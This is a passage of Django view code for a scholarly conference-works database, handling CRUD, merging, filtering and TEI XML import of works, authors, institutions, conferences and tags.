f"{settings.DATA_OUTPUT_PATH}/{settings.PUBLIC_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def private_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PRIVATE_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def WorkCreate(request): if request.method == "GET": if "conference" in request.GET: conf = get_object_or_404(Conference, pk=int(request.GET["conference"])) work_form = WorkForm(initial={"conference": conf.pk}) else: work_form = WorkForm() if request.method == "POST": work_form = WorkForm(request.POST) if work_form.is_valid(): new_work = work_form.save() new_work.user_last_updated = request.user new_work.save() messages.success(request, f"{new_work} created.") return redirect("work_edit_authorship", work_id=new_work.pk) else: for err in work_form.errors: messages.error(request, err) context = {"work_form": work_form} return render(request, "work_create.html", context) @login_required def WorkEdit(request, work_id): work = get_object_or_404(Work, pk=work_id) if request.method == "POST": work_form = WorkForm(request.POST, instance=work) if work_form.is_valid(): work.user_last_updated = request.user work_form.save() messages.success(request, f'"{work.title}" sucessfully updated.') return redirect("work_detail", work_id=work.pk) else: for f, e in work_form.errors.items(): messages.error(request, f"{f}: {e}") work_initial_data = model_to_dict(work) context = {"work_form": WorkForm(initial=work_initial_data), "work": work} return render(request, "work_edit.html", context) @login_required @transaction.atomic def WorkEditAuthorship(request, work_id): work = get_object_or_404(Work, pk=work_id) authorships = work.authorships.all() AuthorshipWorkFormset = formset_factory( WorkAuthorshipForm, can_delete=True, extra=0 ) initial_data = [] for authorship in authorships: base_data = { "author": authorship.author, "authorship_order": authorship.authorship_order, "first_name": authorship.appellation.first_name, "last_name": authorship.appellation.last_name, "affiliations": [aff for aff in authorship.affiliations.all()], } initial_data.append(base_data) if request.method == "GET": authorships_forms = AuthorshipWorkFormset(initial=initial_data) elif request.method == "POST": authorships_forms = AuthorshipWorkFormset(request.POST) if authorships_forms.is_valid(): for d_form in authorships_forms.deleted_forms: d_form_data = d_form.cleaned_data attached_author = d_form_data["author"] Authorship.objects.filter( work=work, author=d_form_data["author"] ).delete() attached_author.save() for aform in authorships_forms: if aform not in authorships_forms.deleted_forms: aform_data = aform.cleaned_data appellation = Appellation.objects.get_or_create( first_name=aform_data["first_name"], last_name=aform_data["last_name"], )[0] affiliations = aform_data["affiliations"] authorship_order = aform_data["authorship_order"] try: if aform_data["author"] is None: author_id = Author.objects.create() else: author_id = aform_data["author"] auth = Authorship.objects.update_or_create( work=work, author=author_id, defaults={ "authorship_order": authorship_order, "appellation": appellation, "user_last_updated": request.user, }, )[0] author_id.user_last_updated = request.user author_id.save() except IntegrityError as e: messages.error( request, f"{e}: Ensure authorship order numbers are unique" ) return redirect("work_edit_authorship", work.pk) auth.affiliations.clear() if affiliations is not None: auth.affiliations.set(affiliations) messages.success( request, f'"{work.title}" authorships successfully updated.' ) if "start_new" in request.POST: return redirect( f"{reverse('work_create')}?conference={work.conference.pk}" ) return redirect("work_detail", work_id=work.pk) else: for error in authorships_forms.errors: messages.error(request, error) context = { "authorships_form": authorships_forms, "work": work, "affiliation_form": AffiliationEditForm, } return render(request, "work_edit_authorships.html", context) @login_required def AuthorInfoJSON(request, author_id): if request.method == "GET": author = get_object_or_404(Author, pk=author_id) author_aff = Affiliation.objects.filter(asserted_by__author=author).distinct() author_dict = { "first_name": author.most_recent_appellation.first_name, "last_name": author.most_recent_appellation.last_name, "work_titles": [w.title for w in author.works.all()][:4], "works_count": author.works.count(), } if author_aff is not None: author_dict["affiliations"] = [ {"name": str(aff), "id": aff.pk} for aff in author_aff ] return JsonResponse(author_dict) @login_required def AffiliationInfoJSON(request, affiliation_id): if request.method == "GET": affiliation = get_object_or_404(Affiliation, pk=affiliation_id) affiliation_dict = { "institution": { "name": str(affiliation.institution), "id": affiliation.institution.id, } } if affiliation.department is not None: affiliation_dict["department"] = affiliation.department return JsonResponse(affiliation_dict) class WorkDelete(LoginRequiredMixin, SuccessMessageMixin, DeleteView): model = Work template_name = "work_delete.html" extra_context = {"cancel_view": "work_list"} success_url = reverse_lazy("work_list") def delete(self, request, *args, **kwargs): messages.success(self.request, f"'{self.get_object().title}' deleted") return super().delete(request, *args, **kwargs) class FullWorkList(ListView): context_object_name = "work_list" template_name = "work_list.html" paginate_by = 10 def get_queryset(self): base_result_set = Work.objects.all() raw_filter_form = WorkFilter(self.request.GET) if raw_filter_form.is_valid(): result_set = base_result_set filter_form = raw_filter_form.cleaned_data work_type_res = filter_form["work_type"] if work_type_res is not None: result_set = result_set.filter(work_type=work_type_res) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(conference=conference_res) affiliation_res = filter_form["affiliation"] if len(affiliation_res) > 0: result_set = result_set.filter( authorships__affiliations__in=affiliation_res ).distinct() institution_res = filter_form["institution"] if len(institution_res) > 0: result_set = result_set.filter( authorships__affiliations__institution__in=institution_res ).distinct() author_res = filter_form["author"] if len(author_res) > 0: result_set = result_set.filter(authorships__author__in=author_res) keyword_res = filter_form["keywords"] if len(keyword_res) > 0: result_set = result_set.filter(keywords__in=keyword_res) topic_res = filter_form["topics"] if len(topic_res) > 0: result_set = result_set.filter(topics__in=topic_res) language_res = filter_form["languages"] if len(language_res) > 0: result_set = result_set.filter(languages__in=language_res) if filter_form["full_text_available"]: result_set = result_set.exclude(full_text="") if filter_form["full_text_viewable"]: result_set = result_set.exclude(full_text="").filter( full_text_license__isnull=False ) text_res = filter_form["text"] if text_res != "": text_query = SearchQuery(text_res, search_type="websearch") result_set = ( result_set.filter(search_text=text_query) .annotate( rank=SearchRank( F("search_text"), text_query, ), search_in_ft_only=ExpressionWrapper( ~Q(title__icontains=text_res), output_field=BooleanField() ), ) .filter(rank__gt=0.1) .order_by("-rank") ) order_res = "rank" first_author_subquery = Authorship.objects.filter( work=OuterRef("pk") ).order_by("authorship_order") order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "year" if order_res == "year": result_set = result_set.order_by("conference__year", "title") elif order_res == "-year": result_set = result_set.order_by("-conference__year", "title") elif order_res == "title": result_set = result_set.order_by("title") elif order_res == "-title": result_set = result_set.order_by("-title") elif order_res == "last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("first_author_last_name", "title") elif order_res == "-last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("-first_author_last_name", "title") return ( result_set.select_related( "conference", "work_type", "parent_session", "full_text_license" ) .annotate( main_series=StringAgg( "conference__series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), main_institution=StringAgg( "conference__hosting_institutions__name", delimiter=" / ", distinct=True, ), ) .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related( Prefetch( "series_memberships", queryset=SeriesMembership.objects.select_related( "series" ), ), "organizers", ), ), "session_papers", Prefetch( "authorships", queryset=Authorship.objects.select_related( "appellation", "author" ), ), "keywords", "topics", "languages", ) ) else: for error in raw_filter_form.errors: messages.warning(self.request, error) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) raw_filter_form = WorkFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data conference_res = filter_form["conference"] if conference_res is not None: conferences_data = ( Conference.objects.filter(id=conference_res.id) .annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), ) .select_related("country") .prefetch_related( "organizers", "series_memberships", "series_memberships__series" ) .all() ) context["selected_conferences"] = conferences_data context["work_filter_form"] = WorkFilter(data=self.request.GET) context["available_works_count"] = Work.objects.count() context["filtered_works_count"] = self.get_queryset().count() context["redirect_url"] = reverse("work_list") return context class FullInstitutionList(LoginRequiredMixin, ListView): context_object_name = "institution_list" template_name = "full_institution_list.html" paginate_by = 10 def get_queryset(self): annotated_affiliations = Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) result_set = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .prefetch_related( Prefetch("affiliations", annotated_affiliations), "country" ) .order_by("-n_works") ) if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data result_set = result_set.annotate( n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ) ) department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter( affiliations__asserted_by__work__conference=conference_res ).distinct() if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by( "-n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by( "n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") return result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["institution_filter_form"] = FullInstitutionForm( initial=self.request.GET ) context["available_institutions_count"] = Institution.objects.count() context["filtered_institutions_count"] = self.get_queryset().count() context["redirect_url"] = reverse("full_institution_list") return context class AuthorInstitutionList(FullInstitutionList): template_name = "author_institution_list.html" def get_queryset(self): base_result_set = Institution.objects.annotate( n_authors=Count("affiliations__asserted_by__author", distinct=True), n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ), ).distinct() result_set = base_result_set if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(works__conference=conference_res) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by("-n_authors") elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by("n_authors") elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") result_set = base_result_set else: result_set = result_set.order_by("-n_authors") return result_set.distinct() def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["redirect_url"] = reverse("author_institution_list") return context class InstitutionEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Edit institution", "cancel_view": "full_institution_list", "merge_view": "institution_merge", } success_message = "%(name)s updated" success_url = reverse_lazy("full_institution_list") def form_valid(self, form): response = super(InstitutionEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class InstitutionCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Create institution", "cancel_view": "full_institution_list", } success_message = "%(name)s created" success_url = reverse_lazy("full_institution_list") def form_valid(self, form): response = super(InstitutionCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response @user_is_staff @transaction.atomic def institution_merge(request, institution_id): institution = get_object_or_404(Institution, pk=institution_id) context = {"merging": institution, "institution_merge_form": InstitutionMergeForm} if request.method == "GET": return render(request, "institution_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = InstitutionMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] if institution == target_institution: """ If the user chooses the existing institution, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an institution into itself. Please select a different institution.", ) return redirect("institution_merge", institution_id=institution_id) else: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Author {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_merge.html", context) @user_is_staff @transaction.atomic def institution_multi_merge(request): context = {"form": InstitutionMultiMergeForm} if request.method == "POST": raw_form = InstitutionMultiMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] source_institutions = raw_form.cleaned_data["sources"].exclude( pk=target_institution.pk ) for institution in source_institutions: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Institution {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} institutions updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_multi_merge.html", context) class AffiliationEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Edit affiliation", "cancel_view": "full_institution_list", "merge_view": "affiliation_merge", } success_message = "%(department)s updated" success_url = reverse_lazy("full_institution_list") class AffiliationCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Create affiliation", "cancel_view": "full_institution_list", } success_message = "%(department)s created" success_url = reverse_lazy("full_institution_list") def get_initial(self, **kwargs): super().get_initial(**kwargs) if "institution" in self.request.GET: self.initial = {"institution": int(self.request.GET["institution"])} return self.initial @login_required def ajax_affiliation_create(request): newaff = Affiliation.objects.get_or_create( department=request.POST["department"], institution=Institution.objects.get(pk=int(request.POST["institution"])), )[0] return JsonResponse({"name": str(newaff), "id": newaff.pk}) @user_is_staff @transaction.atomic def affiliation_merge(request, affiliation_id): affiliation = get_object_or_404(Affiliation, pk=affiliation_id) context = {"merging": affiliation, "affiliation_merge_form": AffiliationMergeForm} if request.method == "GET": return render(request, "affiliation_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AffiliationMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] if affiliation == target_affiliation: """ If the user chooses the existing affiliation, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an affiliation into itself. Please select a different affiliation.", ) return redirect("affiliation_merge", affiliation_id=affiliation_id) else: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_merge.html", context) @user_is_staff @transaction.atomic def affiliation_multi_merge(request): context = {"form": AffiliationMultiMergeForm} if request.method == "POST": raw_form = AffiliationMultiMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] source_affiliations = raw_form.cleaned_data["sources"].exclude( pk=target_affiliation.pk ) for affiliation in source_affiliations: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_multi_merge.html", context) @user_is_staff @transaction.atomic def wipe_unused(request): deletion_dict = { "Author": Author.objects.exclude(authorships__isnull=False).distinct(), "Affiliation": Affiliation.objects.exclude( asserted_by__isnull=False ).distinct(), "Institution": Institution.objects.exclude( Q(affiliations__asserted_by__isnull=False) | Q(conferences__isnull=False) ).distinct(), "Keyword": Keyword.objects.exclude(works__isnull=False).distinct(), "Appellation": Appellation.objects.exclude( asserted_by__isnull=False ).distinct(), } if request.method == "POST": for k, v in deletion_dict.items(): res = v.delete() if res[0] > 0: messages.success(request, f"{k}: {res[0]} objects deleted") any_hanging_items = any([v.exists() for k, v in deletion_dict.items()]) context = {"deletions": deletion_dict, "hanging_items": any_hanging_items} return render(request, "wipe_unused.html", context) class ConferenceCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Conference template_name = "conference_create.html" form_class = ConferenceForm extra_context = { "form_title": "Create conference", "cancel_view": "conference_list", } success_message = "Conference '%(year)s - %(short_title)s' created" @transaction.atomic def post(self, request, *args, **kwargs): response = super().post(request, *args, **kwargs) form_instance = self.get_form() if form_instance.is_valid(): for organizer in form_instance.cleaned_data["organizers"]: self.object.organizers.add(organizer) self.object.save() return response if "goto_abstracts" in request.POST: return redirect(reverse("work_list") + f"?conference={self.object.id}") else: for err in form_instance.errors: messages.error(request, err) return response @user_is_staff @transaction.atomic def ConferenceEdit(request, pk): conference = get_object_or_404(Conference, pk=pk) conference_dict = model_to_dict(conference) conference_dict["organizers"] = conference.organizers.all() form = ConferenceForm(initial=conference_dict) ConferenceSeriesFormSet = formset_factory( ConferenceSeriesInline, can_delete=True, extra=0 ) initial_series = [ {"series": memb.series, "number": memb.number} for memb in SeriesMembership.objects.filter(conference=conference).all() ] context = { "conference": conference, "form": form, "series_membership_form": ConferenceSeriesFormSet(initial=initial_series), "form_title": "Edit conference", "cancel_view": "conference_list", } if request.method == "POST": form = ConferenceForm(data=request.POST, instance=conference) if form.is_valid(): clean_form = form.cleaned_data conference.year = clean_form["year"] conference.short_title = clean_form["short_title"] conference.notes = clean_form["notes"] conference.url = clean_form["url"] conference.organizers.clear() for organizer in clean_form["organizers"]: conference.organizers.add(organizer) conference.hosting_institutions.clear() for hosting_institution in clean_form["hosting_institutions"]: conference.hosting_institutions.add(hosting_institution) conference.save() license_action = clean_form["license_action"] if license_action == "": pass elif license_action == "clear": conference.works.all().update(full_text_license=None) else: license_object = License.objects.get(id=int(license_action)) conference.works.all().update(full_text_license=license_object) series_forms = ConferenceSeriesFormSet(data=request.POST) if series_forms.is_valid(): for d_form in series_forms.deleted_forms: d_form_data = d_form.cleaned_data SeriesMembership.objects.filter( conference=conference, series=d_form_data["series"], number=d_form_data["number"], ).delete() for s_form in series_forms.forms: if s_form not in series_forms.deleted_forms: s_form_data = s_form.cleaned_data SeriesMembership.objects.update_or_create( conference=conference, series=s_form_data["series"], defaults={"number": s_form_data["number"]}, ) messages.success(request, f"Conference {conference} updated.") if "goto_abstracts" in request.POST: return redirect( reverse("work_list") + f"?conference={conference.id}" ) if "goto_series" in request.POST: first_series = conference.series.first() if first_series is None: return redirect("standalone_conferences") else: return redirect("conference_series_detail", pk=first_series.id) return redirect("conference_edit", pk=conference.pk) else: for f, e in series_forms.errors.items(): messages.error(request, f"{f}: {e}") else: for f, e in form.errors.items(): messages.error(request, f"{f}: {e}") return render(request, "conference_edit.html", context) class ConferenceDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Conference template_name = "conference_delete.html" extra_context = { "form_title": "Delete conference", "cancel_view": "conference_list", } success_message = "Conference deleted" success_url = reverse_lazy("conference_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(ConferenceDelete, self).delete(request, *args, **kwargs) class ConferenceXMLLoad(StaffRequiredMixin, DetailView): model = Conference template_name = "conference_xml_load.html" extra_context = {"form": ConferenceXMLUploadForm()} @transaction.atomic def post(self, request, *args, **kwargs): raw_form = ConferenceXMLUploadForm(request.POST, request.FILES) conference = self.get_object() if raw_form.is_valid(): with TemporaryDirectory() as upload_dir: with NamedTemporaryFile(dir=upload_dir, suffix=".zip") as tei_zip: with open(tei_zip.name, "wb") as upload_zip: for chunk in request.FILES["file"]: upload_zip.write(chunk) if not zipfile.is_zipfile(tei_zip.name): messages.error(request, "That is not a valid zipfile.") return render( request, "conference_xml_load.html", { "object": self.get_object(), "form": ConferenceXMLUploadForm(), }, ) with zipfile.ZipFile(tei_zip.name) as zip_ref: zip_ref.extractall(upload_dir) import_results = conference.import_xml_directory(upload_dir) n_success = len(import_results["successful_files"]) n_failed = len(import_results["failed_files"]) messages.info( request, f"{n_success} of {n_success + n_failed} files valid.", ) for err in import_results["failed_files"]: messages.error( request, f"{basename(err['filepath'])}: {err['error']}" ) if n_failed == 0: messages.success(request, f"All files imported successfully.") else: messages.info( request, "Please fix errors or remove malformed files, and re-upload zip. All TEI documents must be valid in order to complete the import.", ) return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) else: for f, e in raw_form.errors.items(): messages.error(request, f"{f}: {e}") return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) @login_required @transaction.atomic def conference_checkout(request, conference_id): conference = get_object_or_404(Conference, pk=conference_id) if request.method == "GET": context = { "conference": conference, "form": ConferenceCheckoutForm( {"entry_status": conference.entry_status, "editing_user": "self"} ), } return render(request, "conference_checkout.html", context) elif request.method == "POST": """ Get the form and update the status if the user has the authority to do so """ raw_form = ConferenceCheckoutForm(request.POST) if raw_form.is_valid(): clean_form = raw_form.cleaned_data if clean_form["entry_status"] == "c" and not request.user.is_staff: messages.error( request, "Only an administrator can mark this conference as completed.", ) return redirect("conference_checkout", conference_id=conference.id) else: if clean_form["assign_user"] == "self": conference.entry_status = clean_form["entry_status"] conference.editing_user = request.user conference.save() messages.success(request, "Conference checked out") elif clean_form["assign_user"] == "clear": conference.entry_status = clean_form["entry_status"] conference.editing_user = None conference.save() messages.success(request, "Conference cleared") return redirect(reverse("work_list") + f"?conference={conference.id}") class SeriesCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Create conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' created" success_url = reverse_lazy("conference_list") class SeriesEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Update conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' updated" success_url = reverse_lazy("conference_list") class SeriesDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Delete conference series", "cancel_view": "conference_list", } success_message = "Series '%(title)s' deleted" success_url = reverse_lazy("conference_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(SeriesDelete, self).delete(request, *args, **kwargs) class OrganizerCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Create conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' created" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = super(OrganizerCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Update conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' updated" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = super(OrganizerEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Delete organizer", "cancel_view": "full_organizer_list", } success_message = "Organizer %(name)s deleted." success_url = reverse_lazy("full_organizer_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(OrganizerDelete, self).delete(request, *args, **kwargs) class OrganizerList(LoginRequiredMixin, ListView): model = Organizer template_name = "full_organizer_list.html" context_object_name = "organizer_list" class KeywordCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Create keyword", "cancel_view": "full_keyword_list"} fields = ["title"] success_message = "Keyword '%(title)s' created" success_url = reverse_lazy("full_keyword_list") class KeywordDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Delete keyword", "cancel_view": "full_keyword_list"} success_message = "Keyword '%(title)s' deleted" success_url = reverse_lazy("full_keyword_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(KeywordDelete, self).delete(request, *args, **kwargs) class KeywordEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Keyword template_name = "generic_form.html" extra_context = { "form_title": "Update keyword", "cancel_view": "full_keyword_list", "merge_view": "keyword_merge", "delete_view": "keyword_delete", } fields = ["title"] success_message = "Keyword '%(title)s' updated" success_url = reverse_lazy("full_keyword_list") class KeywordList(LoginRequiredMixin, ListView): model = Keyword template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Keywords", "tag_edit_view": "keyword_edit", "tag_create_view": "keyword_create", "tag_list_view": "full_keyword_list", "multi_merge": "keyword_multi_merge", "filter_param_name": "keywords", } def get_queryset(self): base_results_set = Keyword.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) if self.request.GET: raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter( title__icontains=filter_form["name"] ) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") else: results_set = results_set.order_by("title") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["tag_filter_form"] = TagForm(initial=self.request.GET) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Keyword.objects.count() return context @user_is_staff @transaction.atomic def keyword_merge(request, keyword_id): keyword = get_object_or_404(Keyword, pk=keyword_id) affected_works = Work.objects.filter(keywords=keyword).all() sample_works = affected_works[:15] count_elements = affected_works.count() - 15 context = { "merging": keyword, "tag_merge_form": KeywordMergeForm, "sample_elements": sample_works, "tag_category": "Keyword", "merge_view": "keyword_merge", } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = KeywordMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] if keyword == target_keyword: """ If the user chooses the existing keyword, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a keyword into itself. Please select a different keyword.", ) return redirect("keyword_merge", keyword_id=keyword_id) else: old_keyword_id = str(keyword) merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def keyword_multi_merge(request): context = { "tag_merge_form": KeywordMultiMergeForm, "tag_category": "Keyword", "multi_merge_view": "keyword_multi_merge", } if request.method == "POST": raw_form = KeywordMultiMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] source_keywords = raw_form.cleaned_data["sources"].exclude( pk=target_keyword.pk ) for keyword in source_keywords: old_keyword_id = keyword.title merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class TopicCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Create topic", "cancel_view": "full_topic_list"} fields = ["title"] success_message = "Topic '%(title)s' created" success_url = reverse_lazy("full_topic_list") class TopicDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Delete topic", "cancel_view": "full_topic_list"} success_message = "Topic '%(title)s' deleted" success_url = reverse_lazy("full_topic_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(TopicDelete, self).delete(request, *args, **kwargs) class TopicEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Topic template_name = "generic_form.html" extra_context = { "form_title": "Update topic", "cancel_view": "full_topic_list", "merge_view": "topic_merge", "delete_view": "topic_delete", } fields = ["title"] success_message = "Topic '%(title)s' updated" success_url = reverse_lazy("full_topic_list") class TopicList(LoginRequiredMixin, ListView): model = Topic template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Topics", "tag_edit_view": "topic_edit", "tag_create_view": "topic_create", "tag_filter_form": TagForm, "tag_list_view": "full_topic_list", "multi_merge": "topic_multi_merge", 